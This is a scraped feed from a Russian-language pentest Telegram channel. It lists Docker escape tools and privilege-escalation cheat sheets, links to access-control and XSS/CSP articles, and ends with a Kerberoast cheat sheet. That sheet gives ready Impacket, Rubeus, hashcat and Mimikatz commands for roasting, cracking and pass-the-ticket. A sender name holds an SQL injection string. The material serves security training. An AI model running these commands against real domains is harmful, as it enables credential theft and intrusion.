Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
Инструменты для поиска проблем в докере 💻
На каждом собеседовании заходит речь про докеры. "Что это?", "Как их использовать?", "Зачем нужны?" и самое главное, — "Как из них выходить?". Есть множество способов, которые можно найти на hacktricks, но сегодня разговор зайдет про инструментарий.
Мне, как нынешнему DevSecOps-у удалось потыкать несколько видов развёртывания инструментов в нем. Я сейчас строю процесс на Gitlab Ci\Cd и у его раннера есть возможность работать как в обычном докере, так и в его "улучшенной" версии.
💻 Docker
Возможен запуск с привилегиями (обычно от этого и отталкиваемся)
💻 Docker in docker
Всегда запущен с привилегиями
💻 Kaniko (dind от Google), buildah, umoci, img
Всегда запущен с привилегиями
🔵 Инструменты Automatic Enumeration/Escape
🌐 deepce — Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE);
🌐 CDK — инструментарий для проникновения в контейнеры с открытым исходным кодом, предназначенный для обеспечения стабильной эксплуатации в различных тонких контейнерах без зависимости от ОС;
🌐 grype — cканер уязвимостей для образов контейнеров и файловых систем;
🌐 LinPEAS — да, у него есть замечательная функция работы с контейнерами;
🌐 dive — инструмент для изучения образа docker, содержимого слоев и поиска способов уменьшения размера образа Docker/OCI.
#opensource #devsecops #blueteam #redteam
На каждом собеседовании заходит речь про докеры. "Что это?", "Как их использовать?", "Зачем нужны?" и самое главное, — "Как из них выходить?". Есть множество способов, которые можно найти на hacktricks, но сегодня разговор зайдет про инструментарий.
Мне, как нынешнему DevSecOps-у удалось потыкать несколько видов развёртывания инструментов в нем. Я сейчас строю процесс на Gitlab Ci\Cd и у его раннера есть возможность работать как в обычном докере, так и в его "улучшенной" версии.
Возможен запуск с привилегиями (обычно от этого и отталкиваемся)
Всегда запущен с привилегиями
Всегда запущен с привилегиями
#opensource #devsecops #blueteam #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10
This media is not supported in your browser
VIEW IN TELEGRAM
Сегодня хочу с вами поделиться двуми прекрасными статьями про атаки на СКУД с помощью NFC и RFID.
#nfc #rfid #xakep #физика
NFC глазами хакера. Разбираем атаки на СКУД системы Mifare
Когда простых идентификаторов для контроля доступа становится недостаточно, многие думают о внедрении более совершенного решения — Mifare. Но так ли эти устройства безопасны, как обещает производитель? Попробуем разобраться!
СКУД глазами хакера. Атакуем системы контроля доступа на основе RFID
Взлом электронных турникетов на входе в здание — заветный хакерский флекс, который так любят показывать в кино. В этой статье я расскажу о системах контроля и управления доступом (СКУД) на основе RFID, и мы вместе разберемся, насколько просто подделать самый распространенный идентификатор EM4100.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥2❤1⚡1
Forwarded from BI.ZONE Bug Bounty
Если вы учитесь в техническом вузе и интересуетесь кибеберзом, участвуйте в Bug Bounty Cup — онлайн-соревновании по багхантингу, которое мы проводим вместе с «Тинькофф».
Ваша задача — обнаружить как можно больше уязвимостей. За каждую успешную находку вас ждут денежные призы и не только.
Перед стартом мы проведем вводный инструктаж, как искать баги.
Соревнование пройдет 28 ноября — успейте подать заявку на участие до 26-го.
Узнать подробности и зарегистрироваться
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9
This media is not supported in your browser
VIEW IN TELEGRAM
#windows #linux #macos #LPE #privesc
Я думаю многие из нас слышали про GTFOBins — cheatsheet по повышению привилегий в Linux. Но что же делать, если вы попали на Windows или MacOS?
1. LOLBAS — аналог GTFOBins только для Windows
2. LOLDrivers — cheatsheet по уязвимым драйверам Windows
1. LOOBins — тут собрано множество тем, таких как разведка, закрепление, повышение привилегий, обход средств защиты и т.д.
1. GTFOArgs — тот случай, когда даже GTFOBins не хватает, то вы всё ещё можете попробовать сделать PrivEsc через аргументы к различными командам.
ㅤ
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡12❤8👍3🔥2
Forwarded from wr3dmast3r vs pentest
Content-Security-Policy: способ борьбы с уязвимостями межсайтового скриптинга 🔒
Настройка, использование и способы обхода защиты🐈
https://telegra.ph/Content-Security-Policy-10-31
Настройка, использование и способы обхода защиты
https://telegra.ph/Content-Security-Policy-10-31
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Content Security Policy
Что такое CSP? Content-Security-Policy или CSP — это встроенная технология браузера, которая помогает защитить от атак, таких как межсайтовый скриптинг (XSS) . Она перечисляет и описывает пути и источники, из которых браузер может безопасно загружать ресурсы.…
❤9
#заметка
если у вас не работает буфер обмена или drag&drop на бубунте в VMware, то попробуйте следующие методы:
1. Установите VMware Tools, следуя обычному методу (Виртуальная машина —> Переустановить VMWare Tools)
1.1. Если автоматическая установка не началась, то либо переходим к пункту 2, либо вручную попробуйте установить. Копируем архив с подключившегося iso, распаковываем командой
2. Если первый вариант не прокатил, то попробуйте
если у вас не работает буфер обмена или drag&drop на бубунте в VMware, то попробуйте следующие методы:
1. Установите VMware Tools, следуя обычному методу (Виртуальная машина —> Переустановить VMWare Tools)
1.1. Если автоматическая установка не началась, то либо переходим к пункту 2, либо вручную попробуйте установить. Копируем архив с подключившегося iso, распаковываем командой
tar xvfz *.tar.gz и запускаем скрипт sudo ./vmware-install.pl. Можно везде тыкать Enter. 2. Если первый вариант не прокатил, то попробуйте
sudo apt install open-vm-tools-desktop❤9👍7⚡3
Kerberoast. Когда крадешь билеты на концерт, но не знаешь, как их использовать.
#Windows
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.
➡️ Инструменты:
Rubeus
Kerbrute
Impacket
PsExec
➡️ ASREP-Roast
➡️ Impacket
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
➡️ Rubeus
Извлечение из всех учетных записей домена
➡️ Cracking
Windows
Linux
``
ㅤ
➡️ Brute Force
➡️ Kerbrute
➡️ Rubeus
со списком пользователей
Kerberos-based Password Spraying
➡️ Kerberoasting
➡️ Impacket
ㅤ
➡️ Rubeus
Kerberoast всех пользователей домена
Все пользователи в поздразделении OU
Атака на конкретных пользователей
➡️ Pass-The-Ticket
➡️ Mimikatz
Сбор тикетов
Инжект тикета
Создать CMD с инжектированным тикетом
➡️ Rubeus
Дамп тикетов
Инжект тикета
➡️ PsExec
Используется после инъекции тикетов через Rubeus или Mimikatz
🌚 @poxek
#Windows
Kerberoast - это метод атаки, который используется для получения хешей паролей пользователей в Windows домене, которые будет возможно сбрутить в оффлайн режиме.
Rubeus
Kerbrute
Impacket
PsExec
Проверка ASREP для всех пользователей домена (Требуются валидные данные учетной записи)
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"ㅤ
Проверка ASREP по списку пользователей домена (не требует доменных учетных данных)
python2 GetNPUsers.py <Domain> -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$"ㅤ
Извлечение из всех учетных записей домена
.\Rubeus.exe asreproastㅤ
.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt
Windows
hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt
Linux
``
bash
john --wordlist rockyou.txt Hashes.txt --format=krb5tgs
hashcat -m 18200 -a 3 Hashes.txt rockyou
``ㅤ
./kerbrute userenum <UserList> --dc <IP> --domain <Domain>ㅤ
со списком пользователей
.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain>ㅤ
Kerberos-based Password Spraying
.\Rubeus.exe brute /passwords:<Wordlist>ㅤ
GetUserSPNs.py <Domain>/<User>:<Password> -dc-ip <IP> -request
ㅤ
Kerberoast всех пользователей домена
.\Rubeus kerberoastㅤ
Все пользователи в поздразделении OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=localㅤ
Атака на конкретных пользователей
.\Rubeus.exe kerberoast /user:File_SVCㅤ
Сбор тикетов
sekurlsa::tickets /export
Инжект тикета
kerberos::ptt <.kirbi file>
Создать CMD с инжектированным тикетом
misc::cmdㅤ
Дамп тикетов
.\Rubeus.exe dump
Инжект тикета
.\Rubeus.exe ptt /ticket:<.kirbi file>ㅤ
Используется после инъекции тикетов через Rubeus или Mimikatz
.\PsExec.exe -accepteula \\<IP> cmdㅤ
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23🔥2❤1